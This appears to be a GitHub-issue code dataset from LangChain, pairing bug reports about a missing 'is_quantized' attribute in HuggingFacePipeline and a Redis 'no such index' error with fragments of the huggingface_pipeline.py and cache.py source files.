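This quantization guard is the exact line the tracebacks in the surrounding issue point at: plain attribute access fails for architectures such as `LlamaForCausalLM` that never define `is_quantized`. A minimal defensive sketch, assuming `getattr` fallbacks (and dropping the likely unintended `model.model.` indirection); the merged PR may differ in detail:
```python
# Sketch only: default each capability flag to False when the attribute is absent.
if (
    getattr(model, "is_quantized", False)
    or getattr(model, "is_loaded_in_4bit", False)
    or getattr(model, "is_loaded_in_8bit", False)
) and device is not None:
    # Keep Accelerate-placed models on the device they were loaded to.
    device = None
```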
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2. cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3. python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | logger.warning(
f"Setting the `device` argument to None from {device} to avoid "
"the error caused by attempting to move the model that was already "
"loaded on the GPU using the Accelerate module to the same or "
"another device."
)
device = None
if device is not None and importlib.util.find_spec("torch") is not None:
import torch
cuda_device_count = torch.cuda.device_count()
if device < -1 or (device >= cuda_device_count):
raise ValueError(
f"Got device=={device}, "
f"device is required to be within [-1, {cuda_device_count})"
)
if device < 0 and cuda_device_count > 0:
logger.warning(
"Device has %d GPUs available. "
"Provide device={deviceId} to `from_model_id` to use available"
"GPUs for execution. deviceId is -1 (default) for CPU and "
"can be a positive integer associated with CUDA device id.",
cuda_device_count,
)
if "trust_remote_code" in _model_kwargs:
_model_kwargs = {
k: v for k, v in _model_kwargs.items() if k != "trust_remote_code"
}
_pipeline_kwargs = pipeline_kwargs or {}
pipeline = hf_pipeline(
task=task, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2. cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3. python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | model=model,
tokenizer=tokenizer,
device=device,
batch_size=batch_size,
model_kwargs=_model_kwargs,
**_pipeline_kwargs,
)
if pipeline.task not in VALID_TASKS:
raise ValueError(
f"Got invalid task {pipeline.task}, "
f"currently only {VALID_TASKS} are supported"
)
return cls(
pipeline=pipeline,
model_id=model_id,
model_kwargs=_model_kwargs,
pipeline_kwargs=_pipeline_kwargs,
batch_size=batch_size,
**kwargs,
)
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {
"model_id": self.model_id,
"model_kwargs": self.model_kwargs,
"pipeline_kwargs": self.pipeline_kwargs,
}
@property
def _llm_type(self) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2. cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3. python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | return "huggingface_pipeline"
def _generate(
self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
text_generations: List[str] = []
for i in range(0, len(prompts), self.batch_size):
batch_prompts = prompts[i : i + self.batch_size]
responses = self.pipeline(batch_prompts)
for j, response in enumerate(responses):
if isinstance(response, list):
response = response[0]
if self.pipeline.task == "text-generation":
try:
from transformers.pipelines.text_generation import ReturnType
remove_prompt = (
self.pipeline._postprocess_params.get("return_type") |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | != ReturnType.NEW_TEXT
)
except Exception as e:
logger.warning(
f"Unable to extract pipeline return_type. "
f"Received error:\n\n{e}"
)
remove_prompt = True
if remove_prompt:
text = response["generated_text"][len(batch_prompts[j]) :]
else:
text = response["generated_text"]
elif self.pipeline.task == "text2text-generation":
text = response["generated_text"]
elif self.pipeline.task == "summarization":
text = response["summary_text"]
else:
raise ValueError(
f"Got invalid task {self.pipeline.task}, "
f"currently only {VALID_TASKS} are supported"
)
if stop:
text = enforce_stop_tokens(text, stop)
text_generations.append(text)
return LLMResult(
generations=[[Generation(text=text)] for text in text_generations]
) |
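The `stop` handling above delegates to `enforce_stop_tokens`, which truncates the generation at the first stop sequence. A small illustration:
```python
from langchain.llms.utils import enforce_stop_tokens

# Splits on the stop strings and keeps everything before the first match.
print(enforce_stop_tokens("Hello world. Goodbye world.", ["Goodbye"]))
# -> "Hello world. "
```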
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """
.. warning::
Beta Feature!
**Cache** provides an optional caching layer for LLMs.
Cache is useful for two reasons:
- It can save you money by reducing the number of API calls you make to the LLM
provider if you're often requesting the same completion multiple times.
- It can speed up your application by reducing the number of API calls you make
to the LLM provider.
Cache directly competes with Memory. See documentation for Pros and Cons.
**Class hierarchy:**
.. code-block::
BaseCache --> <name>Cache # Examples: InMemoryCache, RedisCache, GPTCache
"""
from __future__ import annotations
import hashlib
import inspect
import json
import logging
import uuid
import warnings
from datetime import timedelta
from functools import lru_cache
from typing import (
TYPE_CHECKING, |
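The module docstring above describes the caching layer abstractly; in practice a cache is activated by assigning the process-global `langchain.llm_cache`. A hedged sketch of the documented pattern:
```python
import langchain
from langchain.cache import InMemoryCache

# Subsequent LLM calls with an identical (prompt, llm_string) pair hit the cache.
langchain.llm_cache = InMemoryCache()
```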
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | Any,
Callable,
Dict,
List,
Optional,
Tuple,
Type,
Union,
cast,
)
from sqlalchemy import Column, Integer, Row, String, create_engine, select
from sqlalchemy.engine.base import Engine
from sqlalchemy.orm import Session
try:
from sqlalchemy.orm import declarative_base
except ImportError:
from sqlalchemy.ext.declarative import declarative_base
from langchain.llms.base import LLM, get_prompts
from langchain.load.dump import dumps
from langchain.load.load import loads
from langchain.schema import ChatGeneration, Generation
from langchain.schema.cache import RETURN_VAL_TYPE, BaseCache
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_env
from langchain.vectorstores.redis import Redis as RedisVectorstore
logger = logging.getLogger(__file__)
if TYPE_CHECKING:
import momento
from cassandra.cluster import Session as CassandraSession
def _hash(_input: str) -> str: |
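Since the records around this chunk concern the indexing guide's Redis example (and this module imports the Redis vectorstore), here is a hedged reconstruction of the indexing flow that can surface `my_docs: no such index` when the RediSearch index was never created; the URL, index name, embedding model, and constructor signature are assumptions based on the 0.0.3xx API and may differ across versions:
```python
from langchain.embeddings import OpenAIEmbeddings
from langchain.indexes import SQLRecordManager, index
from langchain.schema import Document
from langchain.vectorstores.redis import Redis

# Assumed constructor arguments; searching this index before any write fails
# with "redis.exceptions.ResponseError: my_docs: no such index".
vectorstore = Redis(
    redis_url="redis://localhost:6379",
    index_name="my_docs",
    embedding=OpenAIEmbeddings(),
)
record_manager = SQLRecordManager(
    "redis/my_docs", db_url="sqlite:///record_manager_cache.sql"
)
record_manager.create_schema()
index(
    [Document(page_content="hello", metadata={"source": "demo"})],
    record_manager,
    vectorstore,
    cleanup="full",
    source_id_key="source",
)
```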
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Use a deterministic hashing approach."""
return hashlib.md5(_input.encode()).hexdigest()
def _dump_generations_to_json(generations: RETURN_VAL_TYPE) -> str:
"""Dump generations to json.
Args:
generations (RETURN_VAL_TYPE): A list of language model generations.
Returns:
str: Json representing a list of generations.
Warning: would not work well with arbitrary subclasses of `Generation`
"""
return json.dumps([generation.dict() for generation in generations])
def _load_generations_from_json(generations_json: str) -> RETURN_VAL_TYPE:
"""Load generations from json.
Args:
generations_json (str): A string of json representing a list of generations.
Raises:
ValueError: Could not decode json string to list of generations.
Returns:
RETURN_VAL_TYPE: A list of generations.
Warning: would not work well with arbitrary subclasses of `Generation`
"""
try:
results = json.loads(generations_json)
return [Generation(**generation_dict) for generation_dict in results]
except json.JSONDecodeError:
raise ValueError(
f"Could not decode json to list of generations: {generations_json}"
)
def _dumps_generations(generations: RETURN_VAL_TYPE) -> str: |
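A quick round-trip through the two legacy JSON helpers above (module-private functions, shown purely for illustration):
```python
from langchain.schema import Generation

blob = _dump_generations_to_json([Generation(text="hello")])
restored = _load_generations_from_json(blob)
assert restored[0].text == "hello"
```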
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """
Serialization for generic RETURN_VAL_TYPE, i.e. sequence of `Generation`
Args:
generations (RETURN_VAL_TYPE): A list of language model generations.
Returns:
str: a single string representing a list of generations.
This function (+ its counterpart `_loads_generations`) relies on
the dumps/loads pair with Reviver, so it is able to deal
with all subclasses of Generation.
Each item in the list can be `dumps`ed to a string,
then the whole list of strings is JSON-dumped.
"""
return json.dumps([dumps(_item) for _item in generations])
def _loads_generations(generations_str: str) -> Union[RETURN_VAL_TYPE, None]:
"""
Deserialization of a string into a generic RETURN_VAL_TYPE |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | (i.e. a sequence of `Generation`).
See `_dumps_generations`, the inverse of this function.
Args:
generations_str (str): A string representing a list of generations.
Compatible with the legacy cache-blob format
Does not raise exceptions for malformed entries, just logs a warning
and returns None: the caller should be prepared for such a cache miss.
Returns:
RETURN_VAL_TYPE: A list of generations.
"""
try:
generations = [loads(_item_str) for _item_str in json.loads(generations_str)]
return generations
except (json.JSONDecodeError, TypeError):
pass
try:
gen_dicts = json.loads(generations_str)
generations = [Generation(**generation_dict) for generation_dict in gen_dicts]
logger.warning(
f"Legacy 'Generation' cached blob encountered: '{generations_str}'"
)
return generations
except (json.JSONDecodeError, TypeError):
logger.warning(
f"Malformed/unparsable cached blob encountered: '{generations_str}'"
)
return None
class InMemoryCache(BaseCache): |
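Unlike the legacy pair, `_dumps_generations`/`_loads_generations` route every item through `dumps`/`loads` with the Reviver, so `Generation` subclasses survive the round trip. A hedged sketch:
```python
from langchain.schema import ChatGeneration
from langchain.schema.messages import AIMessage

s = _dumps_generations([ChatGeneration(message=AIMessage(content="hi"))])
restored = _loads_generations(s)  # returns None only for malformed blobs
assert isinstance(restored[0], ChatGeneration)
```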
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from https://python.langchain.com/docs/modules/data_connection/indexing you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes it impossible to save in the wanted format, and there's another thing: the index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Cache that stores things in memory."""
def __init__(self) -> None:
"""Initialize with empty cache."""
self._cache: Dict[Tuple[str, str], RETURN_VAL_TYPE] = {}
